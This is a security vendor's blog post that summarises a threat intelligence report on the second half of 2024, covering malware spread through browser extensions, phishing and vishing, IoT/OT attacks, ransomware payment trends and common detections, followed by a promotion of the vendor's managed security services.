Cybersecurity Alert: Key Insights from Ontinue’s 2H 2024 Threat Intelligence Report

Ontinue’s latest threat intelligence report reveals critical insights into the evolving cybersecurity environment during the second half of 2024. As threats become more sophisticated, organizations need to understand these changes to better protect their digital assets.

  Key Findings from the Report

The report highlights four major evolutionary trends in the cybersecurity sphere:

1. Malware Delivery via Browser Extensions and Malvertising – Threat actors are exploiting browser extensions to deliver information-stealing malware, with these malicious extensions persisting even after system reimaging when users reimport their browser profiles.
2. Advanced Phishing & Vishing Tactics – Adversaries are employing sophisticated man-in-the-middle (AiTM) phishing tactics using legitimate sites for initial landing pages before redirecting to malicious domains. Vishing attacks have increased dramatically (1,633%), bypassing email security filters and leveraging AI-driven voice cloning technologies.
3. Exploitation of IoT & OT Environments – As networks expand, attackers increasingly target IoT and OT devices, which often lack robust security controls. These devices run with root privileges and perform configuration operations by passing user data through command shells, making them vulnerable to various attacks.
4. Ransomware Evolution – While ransom payments decreased from $1.25 billion in 2023 to $813.5 million in 2024, the number of reported breaches increased, suggesting ransomware groups are conducting more attacks to compensate for lower payment rates.

  The Changing Economics of Ransomware

The report reveals fascinating shifts in ransomware dynamics. Despite the drop in total payments, attackers are adapting rather than abandoning their strategies:

• Manufacturing, services, and healthcare remain the most frequently targeted sectors
• Smaller organizations (under 50 employees) reported more incidents (1,589) than larger enterprises (513 incidents for companies with 1,000+ employees)
• Attackers are shifting toward targeting critical infrastructure where stakes—and potential payouts—are higher

  Emerging Threat Vectors

The report identifies several concerning developments:

• Microsoft Tool Exploitation: Threat actors are abusing built-in Microsoft tools like Quick Assist and Windows Hello to establish access and operate covertly
• Zero-Day Development: Increased exploitation of zero-day vulnerabilities in network security products, particularly targeting edge devices
• IoT/OT Vulnerabilities: Consumer-grade devices finding their way into corporate networks create significant risks, with examples including attacks on water facilities where pro-Russian actors manipulated human-machine interfaces

  Top Detection Findings

Ontinue’s Advanced Threat Operations team highlighted the most prevalent threats across their platform, including:

1. Potential Lumma stealer activity via PowerShell download
2. Suspicious DLL activity from unusual locations
3. PlugX Remote Access Trojan activity
4. Password spray attacks targeting Microsoft Entra ID
5. Encoded PowerShell execution suggesting obfuscation tactics

  How CinchOps Can Help Secure Your Business

In light of these evolving threats, CinchOps offers comprehensive security solutions to protect your organization:

1. Proactive Threat Detection: Our advanced monitoring systems identify suspicious activities before they become breaches, providing real-time alerts and rapid response capabilities.
2. Ransomware Protection: We implement robust backup solutions, EDR technologies, and security controls specifically designed to prevent, detect, and mitigate ransomware attacks.
3. Authentication Security: Our team ensures proper configuration of authentication systems like Windows Hello and implements phishing-resistant MFA options.
4. IoT/OT Security Management: We provide specialized solutions for securing operational technology and Internet of Things devices, including network segmentation and continuous monitoring.
5. Zero-Day Vulnerability Management: CinchOps delivers rapid emergency patching procedures for critical vulnerabilities, particularly focusing on internet-facing services and edge devices.

Discover more about our enterprise-grade and business protecting cybersecurity services on our Cybersecurity page.

Don’t wait for a breach to improve your security posture. Contact CinchOps today to learn how our comprehensive security solutions can protect your organization against today’s sophisticated cyber threats.

FREE CYBERSECURITY ASSESSMENT